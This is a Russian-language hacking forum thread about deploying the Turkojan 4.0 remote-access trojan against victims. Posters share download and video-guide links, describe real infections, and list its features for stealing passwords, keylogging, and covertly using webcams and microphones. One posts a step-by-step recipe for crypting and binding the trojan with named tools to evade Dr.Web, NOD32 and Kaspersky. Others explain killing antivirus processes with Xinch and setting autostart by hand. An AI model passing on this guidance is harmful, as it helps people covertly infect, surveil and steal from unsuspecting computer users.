Просмотр полной версии : Turkojan 4.0
Один из лучших забугорных троянов в его новой версии 4.0 :rolleyes:
http://www.turkojan.com/eng/screent/ss1.JPG
http://www.turkojan.com/eng/screent/ss10.JPG
Download (http://www.turkojan.com/sayac/click.php?id=10)
Home Page (http://www.turkojan.com/eng/dokumanlar.htm)
Из репы:
за ссылку №1 (пакер там склеенный, да и сам билдер...)
Значицо и качать небуду...видать были ужо случаи...
лиценция не хилая - $100 в месяц или $180 за 4 месяца ..
Cawabunga
21.02.2008, 09:49
Страно туркоджан.ком пашет а http://www.cigicigi.com/ тупо редект не этот сайт :(
Из репы:
за ссылку №1 (пакер там склеенный, да и сам билдер...)
Значицо и качать небуду...видать были ужо случаи...
Если шарк 3 с офф сайта сам такой то,может вообще не смотреть мои темы.. ;)
Видеомануал по туркояну!
_http://www5.zippyshare.com/v/20595512/file.html
_http://rapidshare.com/files/108246747/Turkoyan.rar
_http://webfile.ru/1880924
Нада замутить бы тест
Turkojan 4.0 vs ProRAT, что лучше???
Мое мнение Turkojan, всетаки лучше
ИМХО: против прората ничего не имею... А вот с турком проблемы.. и криптуется плохо...
Можно сделать чтобы в одном файле было сразу 2 сервера, ну чтобы ламер запускал у себя, а доступ к его компу имели 2 юзера? может попробывать 2 сервера с разными настройками айпи, склеить? или лучший вариант получить сначала один доступ, засунуть сервера в автозагрузку и перезагрузить комп ему?
ИМХО: против прората ничего не имею... А вот с турком проблемы.. и криптуется плохо...
Но большой плюс у турка, есть функция просмотра что твориться на компе, криптовать еще не пробовал. Под крипт лучше Poison Ivy
Можно сделать чтобы в одном файле было сразу 2 сервера, ну чтобы ламер запускал у себя, а доступ к его компу имели 2 юзера? может попробывать 2 сервера с разными настройками айпи, склеить? или лучший вариант получить сначала один доступ, засунуть сервера в автозагрузку и перезагрузить комп ему?
Первый и второй вариант абсолютно актуальны.
Конечно лучше сначала закинуть один сервер, а потом второй, учитывая что через первый ты сможешь убрать из автозагрузки все антивири и фаеры, обеспечив этим более лучшую установку второго сервера.
Если склеивать два вместе, не исключено что они будут конфликтовать, или вобще не сработают
подскажите в чем проблема может скрываться?
в трое есть опция Test port
чтобы я туда не вписывал-ответ один "Port has a problem"
судя по всему из за этого и не вижу списков зараженных
у меня тоже самое,
когда ищешь зараженных) ставь порт тот же что ты указал когда создавал сервер.
подскажите в чем проблема может скрываться?
в трое есть опция Test port
чтобы я туда не вписывал-ответ один "Port has a problem"
судя по всему из за этого и не вижу списков зараженных
Тоже такая проблема была.
Потом заметил, что если менять всего 2 цифры стандартного порта, то все работает))))
Тоже такая проблема была.
Потом заметил, что если менять всего 2 цифры стандартного порта, то все работает))))
всё равно не помогло
запускал на вмваре, фаерволов и антивирусов нету.
да и вообще странно с троянами.
на днс идёт отчёт что трой актив, а клиент, запущенный на тачке не видит их в списках.
всё равно не помогло
запускал на вмваре, фаерволов и антивирусов нету.
да и вообще странно с троянами.
на днс идёт отчёт что трой актив, а клиент, запущенный на тачке не видит их в списках.
Ну тогда юзай стандартный пасс
всё перепробовал, но так ничего не вышло.
prorat - в настройках ProConnective... жму тест выдаёт caте be delivered!
turkojan - "Port has a problem"
poison ivy - также не видится DNS
может у провайдера порты эти закрыты? :confused:
Может у тебя нет внешнего айпи своего, а ты кидаешь кому-то с внешки?
сделай всё как в Faq по настройке, в этой теме есть видео.
На видео все четко показано. Следуй ему, у меня работало
На видео все четко показано. Следуй ему, у меня работало
Вообще я это написал постом выше (: , зачем флудить то?)
нет, айпи есть, динамический
привязал Dyndns
наверное проблема в том, что запускаю клиент с вмвари.
поэтому коннект и не проходит и не вижу активных серверов
нет, айпи есть, динамический
привязал Dyndns
наверное проблема в том, что запускаю клиент с вмвари.
поэтому коннект и не проходит и не вижу активных серверов
На видео, я тоже запускал в виртуалки, все гуд
Работает все отлично , но вот есть проблемка с запуском самого троя.
Закриптовал и склеил все как надо. Каспер 7 не палит его , НОД 32 тоже. Но при запуске , трой создает 2 длл библиотеки , которые хорошенько палятся. Кто подскажет как это исправить ??
Если б можно было как-то без них обойтись вначале , а потом при заупске троя , вырубить антивирь и скачать эти файлы , но увы не получится.
Вообщем вопрос - что делать с этими двумя файлами , а то они всю картинку портят
этим 2 файла создаются у тебя на компе при создании сервера, когда их запускаешь ничего не создаётся. сколько раз делал, у "жертвы" ничего не создавалось
Ясно. Спасибо!
Просто я у себя же и проверял. Но , не знаю почему , эти два файла появляются там , где и лежит трой.
Ясно. Спасибо!
Просто я у себя же и проверял. Но , не знаю почему , эти два файла появляются там , где и лежит трой.
Это все из за криптовки. У меня такая же ситуация
Щас закриптую разными прогами и в ручную попробую. Посмотрим.
Щас закриптую разными прогами и в ручную попробую. Посмотрим.
Отпишешься тогды, чем и как прятал
Пока что неудачно!
Максимального чего я смог добиться - это чтоб он без запуска не палился каспером. После запуска появляются вот эти файлы и все .
Пробывал криптовать прогами:
FreeCryptor
PI CRYPTOR v3
PoherNah
RCypter
Poly Crypt
Есть идея. Назовем это Xinch + Turkojan.
У турка палятся только длл , а вот ксинч вообще не палится.
Что если склеить не палевного ксинча и не палевного (до запуска) турка в один файл и в параметрах ксинча поставить "Вырубить процесс допустим avp" .
Запускается ксинч , вырубает антивирь , запускается турк , прописывает себя в автозаргузку , копируется куда надо и все готово.
Если кто-то пробывал - скажите как.
турк прописыват себя в автозагрузку?) о_О
а я вручную его кидал)))
если турк не палится до запуска - кидай его, когда запустят вырубай в процессах антивирь, лезь в автозагрузку и там тоже вырубай)
и всё, т.е. многие антивирусы не сразу находят турка.
...... поставить "Вырубить процесс допустим avp" .
Запускается ксинч , вырубает антивирь , запускается турк , прописывает себя в автозаргузку , копируется куда надо и все готово.
Если кто-то пробывал - скажите как.
Пробовал на KIS 7 никуя не катит) да и вообще процес каспера ксинчем ты не грохнеш... У кого нить есть предложения как эт сделать? :confused:
турк прописыват себя в автозагрузку?) о_О
а я вручную его кидал)))
если турк не палится до запуска - кидай его, когда запустят вырубай в процессах антивирь, лезь в автозагрузку и там тоже вырубай)
и всё, т.е. многие антивирусы не сразу находят турка.
Не покатит. При запуске выплевывает 2 длл-ки .
Я криптану отлично , кину жертве и он ничего не заподозрит. Можно даже склеить. Но как только он запустит файл , рядом с ним появится еще 2 файла , и ошибка про бэкдор вродь . Чтоб нажать "Пропустить" в этом случае , надо быть полным ламером.
Такая же фигня с Проратом , но там есть патч . Говорят , что эти длл палятся из-за плохой криптовки.
Как можно из .exe файла вытянуть эти длл ? Потом можно криптануть их отдельно (одну пробывал - не палится потом) , и засунуть обратно в .exe файл , чтобы он использовал их.
Olegros911
27.04.2008, 19:41
Ребята,а вобще какой трой будет наилутшим если я хочу и спользовать бекдор функцию.Ктото пробывал как ето пашет на пинче или ксинче.А то все мне никак времини протестить не хватает
У меня все получилось. Тестил пока что только на себе.
Касперский 7 не жалуется ни на сам трой , ни на файлы , которые он создает.
Чтоб исправить длл , надо ее выудить из некриптованного и неупакованного троя , криптануть , засунуть обратно , криптануть сам трой и пользоватся.
Если понадобится могу снять видео по настройке , криптованию и запуску turkojan'a.
Не покатит. При запуске выплевывает 2 длл-ки .
Я криптану отлично , кину жертве и он ничего не заподозрит. Можно даже склеить. Но как только он запустит файл , рядом с ним появится еще 2 файла , и ошибка про бэкдор вродь . Чтоб нажать "Пропустить" в этом случае , надо быть полным ламером.
Такая же фигня с Проратом , но там есть патч . Говорят , что эти длл палятся из-за плохой криптовки.
Как можно из .exe файла вытянуть эти длл ? Потом можно криптануть их отдельно (одну пробывал - не палится потом) , и засунуть обратно в .exe файл , чтобы он использовал их.
не понял про что ты, но попробуй поставить Invisible когда создаёшь сервер... ибо у меня 2 файла не создаются никаких
не понял про что ты, но попробуй поставить Invisible когда создаёшь сервер... ибо у меня 2 файла не создаются никаких
Думаешь я в видимом делал????
Точно создаются 2 файла. Не знаю чего они у тебя не создаются.
Выкладываю видео по настройке , крипту и нормальному запуску трояна Turkojan .
_http://depositfiles.com/ru/files/5003643
_http://rapidshare.com/files/110880239/turkojan.rar.html
Если будут вопросы - постараюсь ответить.
Обучающее так сказатЬ видео делаю первый раз . Не судите строго . ;)
Выкладываю видео по настройке , крипту и нормальному запуску трояна Turkojan .
_http://depositfiles.com/ru/files/5003643
_http://rapidshare.com/files/110880239/turkojan.rar.html
Если будут вопросы - постараюсь ответить.
Обучающее так сказатЬ видео делаю первый раз . Не судите строго . ;)
Отличное видео +1
Седня вечерком опробую твой способ :)
Надо поработать над автозагрузкой турка.
Если добиться автозагрузки троя , то можно будет контролировать жертву всегда , когда она онлайн.
Надо поработать над автозагрузкой турка.
Если добиться автозагрузки троя , то можно будет контролировать жертву всегда , когда она онлайн.
Так лучше ее наоборот отключать, что бы каспер не орал!
А потом можно залить уже с автозагрузкой, предварительно отрубив каспера, или вручную вписать в реестр
Так лучше ее наоборот отключать, что бы каспер не орал!
А потом можно залить уже с автозагрузкой, предварительно отрубив каспера, или вручную вписать в реестр
Какой нормальный антивирус даст себя вырубить ?
На теории говорят , что нельзя вырубить Касперского ибо он не дается.
На практике завтра проверю. Пинч + ловкость рук + туркоян.
сори за оффтоп.. в первом посте нормальный турк залит?
Всмысле ?
Если ты про то , протрояненый он или нет , то не знаю.
Это вродь с офф. сайта. Зайди на офф. и оттуда скачай.
такой вопрос ip у меня постоянно меняется то как мне юзать мне юзать Turkojan , или зарегаться на no-ip.com ?? скажите
За ранее спс.
Тебе надо DNS. Можешь зарегить на no-ip.com.
Кстати насчет турка.
Нашел возможность включения автозагрузки.
Действует связка ксинч + туркоян. Записывается в автозагрузку на ура. И ничего не палит.
сори за оффтоп.. в первом посте нормальный турк залит?
Да.
Тебе надо DNS. Можешь зарегить на no-ip.com.
Можешь подробнее написать зарегался я там что дальше? (прогу скачал)
так поехали дальше...
-если впаривать троян сразу нескольким жетвам, то какой будет результат? (сколько впарил столько и логов)
жетава запустила всё ок!!!
попробовал на себе.. всё работает тип топ.
-если сменить имя исходника, то результат измениться? (нет)
-как удолить троян у себя на компе?
-если скорость инЭта плохая. то будет лагать сканирование?
-кто может выложить руководство самими возможностями на русском языке?
пс. по некоторым вопросам сам разобрался
так поехали дальше...
-если впаривать троян сразу нескольким жетвам, то какой будет результат? (сколько впарил столько и логов)
жетава запустила всё ок!!!
попробовал на себе.. всё работает тип топ.
-если сменить имя исходника, то результат измениться? (нет)
-как удолить троян у себя на компе?
-если скорость инЭта плохая. то будет лагать сканирование?
-кто может выложить руководство самими возможностями на русском языке?
пс. по некоторым вопросам сам разобрался
Несколько функций:
Полный доступ к файлам: заливка, скачка, переименовка, запуск, удаление.
Издевательство над пк: скрытие всех значков, кнопок, переворот рабочего стола на 90, 180 градусов и т.д.
Скрытая скачка с удаленного сервера и запуск.
Ну и моя любимая фича: просмотр в так называемом прямом эфире все что твориться на пк.
это всё понятно... я имею ввиду есть ли руководство по функциям работы троя?
пункт - что и как делает
и так далее
Я В ЭКСТАЗЕ ЭТ ЭТОГО ТРОЯНА... режим наблюдения. прямой чат с жертвой....
это всё понятно... я имею ввиду есть ли руководство по функциям работы троя?
пункт - что и как делает
и так далее
Я В ЭКСТАЗЕ ЭТ ЭТОГО ТРОЯНА... режим наблюдения. прямой чат с жертвой....
видео есть на 1 странице
чат жесть))
видео..... там просто установка и пару приколов.
мне нужно найти инфу чтобы было описано все функции...
каждая по отдельности.. что нажать и что из этого получиться
и ещё. есть ли вероятность, что меня засекут(по ай пи) если я буду сканить жертву?
видео..... там просто установка и пару приколов.
мне нужно найти инфу чтобы было описано все функции...
каждая по отдельности.. что нажать и что из этого получиться
и ещё. есть ли вероятность, что меня засекут(по ай пи) если я буду сканить жертву?
Вероятность есть. Но это если впаривать умным юзеркам. Все , что происходит на компе жертвы должно ведь куда-то отсылаться , так вот оно и идет к тебе на айпи адрес.
Насчет функций. Могу сам описать их и выложить сюда , если надо .
Насчет функций. Могу сам описать их и выложить сюда , если надо .
будем очень признательны... Хрестикаф наставим))))))
-а можно срубать сразу несколько логов?.. чтобы контролировать пару жертв...
про вероятность что засекут. Тестил ночью трой и попались отчёты с интернет клубов... там админы вродь не глупые.. я конечно прокси юзал с торОМ но всё же... инфа же по идее идёт на реальный ай пи и прокси тут не катят
nepster спс те за видео по крипту.Dll'ка и в правду перестает палиться но вот авасть всеравно продолжает палить exe'шник.Народ поэксперементируйте с крипторами.И тестните у кого есть приватный от глофа.
будем очень признательны... Хрестикаф наставим))))))
-а можно срубать сразу несколько логов?.. чтобы контролировать пару жертв...
про вероятность что засекут. Тестил ночью трой и попались отчёты с интернет клубов... там админы вродь не глупые.. я конечно прокси юзал с торОМ но всё же... инфа же по идее идёт на реальный ай пи и прокси тут не катят
Несколько срубать - можно)
Везёт вам, с внешним айпи (:
а мне приходится только в локалке =(
как удолить троян с компа?
какой именно троян ? Turkojan ?
ну да
MaZaHaKer
30.04.2008, 19:01
какой именно троян ? Turkojan ?
а моет быть такое, что когда я конектюсь к жертве, меня палят.... просто не один раз было.. пока я дойду до нужной папки соединение вырубается и лузер в офлайне
Сделал все по видео - результат при запуске троя nod палит его
у меня каспер не палит... нод палит... касперский с недавним(не новым) обновлением пропускает.
почему не удоляются файлы... нахожу файл lsass.ехе пробую его удолять, а он не удоляется... если не удолять.. что можно ещё с ним сделать, чтобы он не функционировал?
MaZaHaKer
01.05.2008, 08:25
Сделал все по видео - результат при запуске троя nod палит его
его уже почти все палит . он вышел давно . ждем 5 версию
Конечно его работоспособность зависит от версии , но не только. Пользуйтесь крипторами и добивайтесь хороших результатов. Я сделал ксинча на вырубание антивируса касперского 7 , склеил с хорошо закриптованным турком , запустил.
Результат: Касперский в оффлайне , туркоян в автозапуске , у меня прямой доступ к жертве.
MaZaHaKer
01.05.2008, 12:34
если руки умелые все можно сделать . интересно когда 5-ка будет ?
Описание функций
Passwords
Server passwords - воровство паролей из аськи , фтп , браузера , менеджеров закачек , е-мейлов и другого. Для работы этого раздела понадобится скачать плагин. Вам предложат скачать плагин.
Плагин скачивается автоматически при нажатии.
Accessories
Remote desktop - включает возможность видеть , что творится в данный момент на компе у жертвы. Онлайн видео получается.
Webcam streaming - включает возможность видеть изображение , переданное с видео-камеры (если таковая имеется)
Audio streaming - включает возможность прослушивания микрофона жертвы (если таковой имеется)
Settings manager
Clipboard settings - просмотр клипбоарда жертвы , изменения и работоспособности.
Explorer settings - изменения домашней странички экплорера , открытия любой страницы , просмотр последних посещенных сайтов.
Application settings - изменения открытых приложений. Свернуть/развернуть , активировать/деактивировать , спрятать кнопку закрытия "Х" , спрятать/показать , закрыть приложение.
Applications - выключение любого процесса
Services - список запущенных сервисов , их отключение/запуск/удаление.
Registry editor - изменение регистра жертвы
Mouse settings - изменение скорости передвижения мышки , скорости нажатия кнопок мыши , расположение кнопок (левая на правую ) , выключение работы мыши, определение позиции мышки. (Х/Y)
Resolution - смена расширения экрана
Manage keyboard
Keyboard settings - влючение\выключение работоспособности клавиш всех и по отдельности
Online\Offline keylogger - кейлогер онлайн и оффлайн , есть возможность сохранять логи
Extra
Online\Offline msn sniffer - сниффер онлайн и оффлайн
Communication
Chat with server - включение чата с жертвой
Send message - имитирование ошибки
Manage files
File manager - простенький просмотр файлов жертвы
Find files - поиск файлов на компе жертвы
Remote download - закачка любого файла в указанную папку на компе жертвы
Commands
Remote shell - что-то типа cmd , возможность вписывать любые досовские команды
Block sites - блокированные сайты на компе жертвы , их разблокировка или блокировка
Server properties
Server settings - изменение настроек сервера , закрытие и удаление сервера на компе жертвы
System information
Get system info - получить системную информацию
Installed application - список установленных приложений
Fun manager
Fun menu - показать\спрятать значки на раб. столе , кнопку пуск , часы и т.д.
Extra fun - выключение\перезагрузка\жд ущий режим компа жертвы , появление бесконечной ошибки.
Писал все сам. Может это не самое полное описание всех функций , но другого пока не видел.
Нод палит скотина причем палит какую то дллку которую прога выбрасывает(кроме руткитовской). Походу еще что то криптовать надо.
Нод палит скотина причем палит какую то дллку которую прога выбрасывает(кроме руткитовской). Походу еще что то криптовать надо.
На твой вопрос ответит видео которое nepster любезно выложил
Золден именно потому видео я все и криптовал но там криптовка только одной дллки а мне надо 2 =)))). Вот обе которые прога выбрасывает:
C:\WINDOWS\cmsetac.dll
C:\WINDOWS\ntdtcstp.dll
На другом форуме нашел что за ntdtcstp.dll отвечает DENEME.
Паркер тебе совет: в windows папке поищи mstwain32.exe, если наидешь, заиди в безопастном режиме и удали ее.
плохо что нужно не динамическое ай пи...
у кого есть серваки которые продают постоянные ай пи.. желательно на русскойм языке.
aseffect
02.05.2008, 12:16
Золден именно потому видео я все и криптовал но там криптовка только одной дллки а мне надо 2 =)))). Вот обе которые прога выбрасывает:
C:\WINDOWS\cmsetac.dll
C:\WINDOWS\ntdtcstp.dll
На другом форуме нашел что за ntdtcstp.dll отвечает DENEME.
Паркер тебе совет: в windows папке поищи mstwain32.exe, если наидешь, заиди в безопастном режиме и удали ее.
Пробывал извлекать и криптовать ресурс DENEME, вроде НОД не палит. Полюбому спс за инфу +1
плохо что нужно не динамическое ай пи...
у кого есть серваки которые продают постоянные ай пи.. желательно на русскойм языке.
Список днс находится тут
_http://internet-services.net.ru/dns_free.php
_http://www.prosto.name/
Итак как оказалось нужно еще и криптовать папку deneme в ресурс хакере. Делается все точно так же как в гаиде непстера однако когда заменяешь фаил внутри екзешника нужно указать язык 1033 а не 0.
Итак как оказалось нужно еще и криптовать папку deneme в ресурс хакере. Делается все точно так же как в гаиде непстера однако когда заменяешь фаил внутри екзешника нужно указать язык 1033 а не 0.
подробней можно??? и какой результат?
К сожалению плохо тк при криптовки этой части у туркояна появляются проблеммы с запуском.
Смысл криптовать ту часть?
Язык я ставил такой , потому что у папки ROOTKIT стоял такой язык. Recource name тоже надо будет поменять.
У меня один раз попадалось такое , но не помню как. Я криптанул чем-то и палилась только вторая длл. Попробуй другим чем-то криптовать. Какой у тебя антивирь?
Кстати. Сейчас проблемы с запуском . Раньше работало все , а сейчас вообще не пашет . Копируется , запускается нормально , в диспетчере задач процесс есть этот , а вот запускаю проверку порта - не находит.
aseffect
02.05.2008, 15:17
Кстати. Сейчас проблемы с запуском . Раньше работало все , а сейчас вообще не пашет . Копируется , запускается нормально , в диспетчере задач процесс есть этот , а вот запускаю проверку порта - не находит.
А у меня заработало ,на VMware тестил.
А где можно взять плагины для Turkojan 4.0?
А где можно взять плагины для Turkojan 4.0?
На официальном сайте http://www.poisonivy-rat.com/
http://www.poisonivy-rat.com/ - на турка ??
может http://www.turkojan.com/ - ?
http://www.poisonivy-rat.com/ - на турка ??
может http://www.turkojan.com/ - ?
Извиняюсь :(
Не ту ссыль дал
Pernat1y
02.05.2008, 18:52
чем вам эта турка так понравилась? те-же ива и шарк лучше на порядок
можно на турке запускать файлы на комп жертвы?
если да то как?
скачать знаю как. а как запускать?
Ева криптуется лучше но вот кейлогер у нее хромает на обе ноги причем хромает страшно. Турк вытаскивает инфу с компа владельца гораздо лучше =)
Непстер соглашусь насчет незапускается - такая же тема.
Ева криптуется лучше но вот кейлогер у нее хромает на обе ноги причем хромает страшно. Турк вытаскивает инфу с компа владельца гораздо лучше =)
Непстер соглашусь насчет незапускается - такая же тема.
На себе больше не работает , зато на пацанчике одном - летает. Все функции работают.
Там дело вот в чем - после криптовки трой какойто не стабильный то бишь пожет не запустится может сорватся прямо во время передачи данных вообще вообщем полный комплект =). Понять бы почему..
Я для контроля туркояна юзаю еву.
Если правильно сделать один раз , и он пропишется в автозагрузку , то потом нормально работать будет.
Всмысле юзаешь "для контроля турка еву" ?
aseffect
02.05.2008, 21:59
Туркоян хороший трой мне всё нравица кроме файл-менеджера(
Нет ли на него никаких плагинов с продвинутым ФМ?
Туркоян хороший трой мне всё нравица кроме файл-менеджера(
Нет ли на него никаких плагинов с продвинутым ФМ?
Есть встроенная удаленная загрузка. С помощью нее качаешь в любую папку криптованный улучшенный трой с понравившейся тебе ФМ , запускаешь этот трой и конектишься.
У кого такая же проблема с запуском ??
Что-то глючит мне кажется прога.
http://www.turkojan.com/
Чо то не нашел я там никаких плагинов
http://www.turkojan.com/
Чо то не нашел я там никаких плагинов
А какие тебе надо?
А какие тебе надо?
server passwords
глючит нипадецки... то сам закрывается. то подвисает
а то вообще хрен запустишь. но в общем норм
aseffect
03.05.2008, 11:09
server passwords
это фактически не плагин для Туркояна, просто исп. этой ф-ии возможно при апдейте на сервер, что на уд. машине, некоторыми компонентами. Ты жмёш в клиенте Туркояна server passwords, выбираешь любой из пассов на кражу, выскочит окно с запросом Install PLugin ты жмёшь yes. И когода оно поставит плагин на уд. машину будут тырица пассы)
Иссправите, если что не так сказал )))
что то сегодня сделал билд и ничего не работает.. что случилось? сделал же всё как положено)))
что трой сдох???
это фактически не плагин для Туркояна, просто исп. этой ф-ии возможно при апдейте на сервер, что на уд. машине, некоторыми компонентами. Ты жмёш в клиенте Туркояна server passwords, выбираешь любой из пассов на кражу, выскочит окно с запросом Install PLugin ты жмёшь yes. И когода оно поставит плагин на уд. машину будут тырица пассы)
Я не ставил . попробывал один раз , начал орать каспер. Я так подумал , ведь это может быть двустронний плагин , он отсылает тебе , то что ты хочешь и им . Ведь может быть такое.
что то сегодня сделал билд и ничего не работает.. что случилось? сделал же всё как положено)))
что трой сдох???
Все работает замечательно. ВОт только у себя что-то не пашет . На виртуалке щас проверять буду.
Все работает замечательно. ВОт только у себя что-то не пашет . На виртуалке щас проверять буду
так вот я и говорю что тестю на себе... ничего не работает))))
aseffect
03.05.2008, 17:04
Я не ставил . попробывал один раз , начал орать каспер. Я так подумал , ведь это может быть двустронний плагин , он отсылает тебе , то что ты хочешь и им . Ведь может быть такое.
Да такая фича есть. Но антивирь орёт только если на каспере включена расширеная проактивка и интерактивная защита, из 15 юзеров, которым я вчера всадил турка лишь у 2-х была она врублена (спрашивала про обращения реестра и про плагин) притом один из ник (наверна нуб) разрешил изменния реестра и разрешил работу плагина, 2-й шарящий юзер трояна обрубил. А у остальных каспер без расширеного проактива, ил всякие там НОДы Др.Вебы, которые необладают проактивкой, там работало 100%.
Вывод просица сам собой.
Кстати когда я компилю Турка, я не ставлю автозагрузку, чтоб не орал антивирь. НО потом у "потенциальных лузеров" (у кот не каспер или каспер без интерактива) с помощью редактора реестра турка прописую автозапуск вручную, аналогично и плагин для пассворда
Да такая фича есть. Но антивирь орёт только если на каспере включена расширеная проактивка и интерактивная защита, из 15 юзеров, которым я вчера всадил турка лишь у 2-х была она врублена (спрашивала про обращения реестра и про плагин) притом один из ник (наверна нуб) разрешил изменния реестра и разрешил работу плагина, 2-й шарящий юзер трояна обрубил. А у остальных каспер без расширеного проактива, ил всякие там НОДы Др.Вебы, которые необладают проактивкой, там работало 100%.
Вывод просица сам собой.
Кстати когда я компилю Турка, я не ставлю автозагрузку, чтоб не орал антивирь. НО потом у "потенциальных лузеров" (у кот не каспер или каспер без интерактива) с помощью редактора реестра турка прописую автозапуск вручную, аналогично и плагин для пассворда
С реестром можно и не мучатся. Склеиваешь ксинча , который вырубает антивирь и турка и кидаешь кому-то. Ксинч вырубает антивирус , но иконка его остается в трее (у меня вродь так , и на виртуалке) , и он нормально прописывается в автозапуск.
Один раз просто запустил , нажимаю старт , а оно мне выводит , что мол какой-то тип из германии нашелся. =) Я зашел , действительно из германии. То ли это прокси было , но ему я точно не давал троя.
aseffect
03.05.2008, 17:53
мой трой попал владельцу Vista. Турк прошол, всё путём, не спалил ни каспер и брандмауер. Закинул ИВУ, её на стадии конекта палит стандартный брандмауер Висты.
Нужна альтернатива. Лутшую альтернативу я вижу в поднятии ФТП сервера на уд. машине с Вистой. Нужен Хинч....
P.S былобы неплохо скомпильть Хинча на эту ф-ю и выложить на всеобщее обозрение.
Тока у мну праблема пробывал компилить 4 разными билдерами- выходит нерабочий торй, мож ты сможешь это сделать.
P.P.S, а что Хинч безпаривно завершает процесс КАСПЕРА?
мой трой попал владельцу Vista. Турк прошол, всё путём, не спалил ни каспер и брандмауер. Закинул ИВУ, её на стадии конекта палит стандартный брандмауер Висты.
Нужна альтернатива. Лутшую альтернативу я вижу в поднятии ФТП сервера на уд. машине с Вистой. Нужен Хинч....
P.S былобы неплохо скомпильть Хинча на эту ф-ю и выложить на всеобщее обозрение.
Тока у мну праблема пробывал компилить 4 разными билдерами- выходит нерабочий торй, мож ты сможешь это сделать.
P.P.S, а что Хинч безпаривно завершает процесс КАСПЕРА?
Ыть... в том то и дело... я сам удивился
Он как бы вырубается , но в диспетчере задач он остается , включенным не мной , а System. Но ничего не выдает , не орет.
Хочу попробывать поставить прокси , но не могу найти. Кто знает прокси троян ?
Pernat1y
03.05.2008, 20:15
Закинул ИВУ, её на стадии конекта палит стандартный брандмауер Висты.
в иве есть инжект в доверенные приложения
aseffect
03.05.2008, 20:59
А теперь моя мини мануалка по клейке и криптовке Туркояна для непаливности Dr.Web
Я криптовал и юзал троя как показано в видеомануалке от nepstera (кста БОЛЬШОЕ ему СПС) топовые антивири вроде KIS7, NOD32 его не видят, а ГАЛИМЫЙ на первый взгляд Dr.Web его ПАЛИТ(!!!) я долго парился и наконец нашол метод борьбы с этим.
Итак нап понадобиться GIOFF cryptor, pohernax 1.0.7 и клей - FJS (вообщем в видео было это всё кроме GIOFF cryptor)
1) Компилим Турка (как на видео)
2) С помощью ResHack выдираем рес-сы DENEME и ROOTKIT и криптим их с помощью pohernax 1.0.7 (в настройках оставляем ЕДИНСТВЕННУЮ галочку Crypt Import), внедряем их опять в троя (как это сделать подробно описано в видео)
3) Криптуем самого троя с помощью GIOFF cryptor (в настройках ставим галочки Оригинальная точка входа (OEP) (Not change Original Entry Point) и Дополнительная упаковка (pack the file, using packer)->>> UPX v3.0)
4) Клеим его с другим .ехе при помощи FJS. (етот клей палит Dr.WEB; KIS и NOD не палят)
5) Склееный файл (result.exe) криптуем при помощи pohernax 1.0.7 (в настройках оставляем ЕДИНСТВЕННУЮ галочку Crypt Import).
ВСЁ!!!!
Мы имеем закриптованый, склееный файл, который 100% работоспособен ( сам проверял) и не палиться Dr.WEB.... ну само собой великие и могучие KIS и NOD и всякие AVG его НЕ ПАЛЯТ!!!!
Имее универсальный непалящийся на данный момент файл!!!
aseffect
03.05.2008, 21:02
Незабываем, что нужный инструментарий берём здесь
http://forum.antichat.ru/forum80.html
в разделах "Джойнеры" и "Крипторы" там всё есть что нада
Да нет я думаю здесь проблема в том что прога все-таки планая и эти плагины будут доступны после покупки, а так как ты написал- не прокатывает
склеил с пинчём криптованым...
использовал методу выше.
не палится ничем...
вот только после установки не удоляется.
склеил с пинчём криптованым...
использовал методу выше.
не палится ничем...
вот только после установки не удоляется.
У себя попробовал - все равно нод палит :(
У себя попробовал - все равно нод палит
ну я щас впариваю... проходит где то 80%
и блин... некоторые отчёты от пинча приходят, а турк блокирует что то)))) чё делать?
ну я щас впариваю... проходит где то 80%
и блин... некоторые отчёты от пинча приходят, а турк блокирует что то)))) чё делать?
кидай турка, сливай на комп пинч и запускай, гораздо проще и меньше головной боли (:
ок... слитья могу.. а как запустить пинч на компе???
Через фаиловое меню =) Правой кнопкой.
помогите,запускаю и отчёт не идёт на сервер,в чём может быть проблема?
помогите,запускаю и отчёт не идёт на сервер,в чём может быть проблема?
Не у одного тебя такая проблема была :)
Читай выше, все написано, даже видеомануал найдешь
Olegros911
05.05.2008, 08:41
Про раскировку турка:делаем ксинч там ставим вырубать процеси антивирусов(не процес оболочки,а процес ядра)Тогда антивирь на взгляд типа и робочий,а до скана непригоден.Криптуем ксинч.Клеем и наслаждаемся
блин нефига ваще не пашет всё вроде прально порты и т.д. приконектился... мож проблема в том что чтото недаёт отправиться на сервер?настроил всё как в видео=\\\
ты на себе тестил?... посмотри в процессах прописался турк?
он ищезает после запуска?
да я на себе тестил,в процессах сидит после запуска сидит в процессах и сидит токо вот нихрена невидно ...
да я на себе тестил,в процессах сидит после запуска сидит в процессах и сидит токо вот нихрена невидно ...
Я вернулся )
Ответь на пару вопросов.
1. У тебя реал ИП ?
2. Ты запустил турка и приконектился к себе?
3. Чем криптовал?
4. Какой антивирь?
sasha008
05.05.2008, 15:23
А на Рускам языке есть?
m9chikскорее всего ай пи динамик)))
на русском нет к сожалению..
Кста на счет динамических ип, походу поюзать не получиться((
Кста на счет динамических ип, походу поюзать не получиться((
получится.. просто нужно на каждый ай пи делать новый билд.
Вот захотелось посмотреть на данное чудо, все зделал правильно (по инструкции) :), но вот чет сколько портов вписывал не 1 не пашет, пишит "Port has a problem", в чем проблема?
sasha008
05.05.2008, 19:25
кто нибуть русифицыруйте Turkojan 4.0
Вот захотелось посмотреть на данное чудо, все зделал правильно (по инструкции) , но вот чет сколько портов вписывал не 1 не пашет, пишит "Port has a problem", в чем проблема
я ваще последнее время по умолчанию юзаю порт. то что прописан на видео
Pernat1y
05.05.2008, 20:55
хреново он руссифицируеться. по крайней мере в главном меню кодировка слетает.
учи инглиш.
А что тебе не понятно там?
Там англ. яз на минимуме .
Если что-то не понятно , я там в 6 вроде посте описал все функции. Хоч - глянь.
KPOT_f!nd
05.05.2008, 23:49
Эливан говорил что криптовкой будут небольшие траблы (
:confused: что происходит???
создаю билд. криптую его как показано на последнем видео.
тестю на себе и проиходит следующее... вылазит имитация ошибки. билд ищезает. в процессах вижу прописывается, НО потом он сразуже ищезает из процесса и нету конекта.
а когда криптую криптом глофа, то всё работает. (только не пользуюсь клеем)
В чём проблемма? что я нетак делаю в первом случает???
ведь до этого было всё ок.
-и ещё. кому не жалко распишите кто то, как делать хинч чтобы он вырубал антивирусы, а значки оставались. Если кому несложно, сделайте видео. Это процесс на пару минут, но я не могу правильно сделать)))
с плагином паролей такая фишка... начал качать плагин.. жертва ушла в оффлайн.. потом рернулась и плагин качаться не хочет.. жму на пасс. а подтверждение на скачку не приходит.. что сдеть чтобы докачать???
_http://depositfiles.com/files/5175248
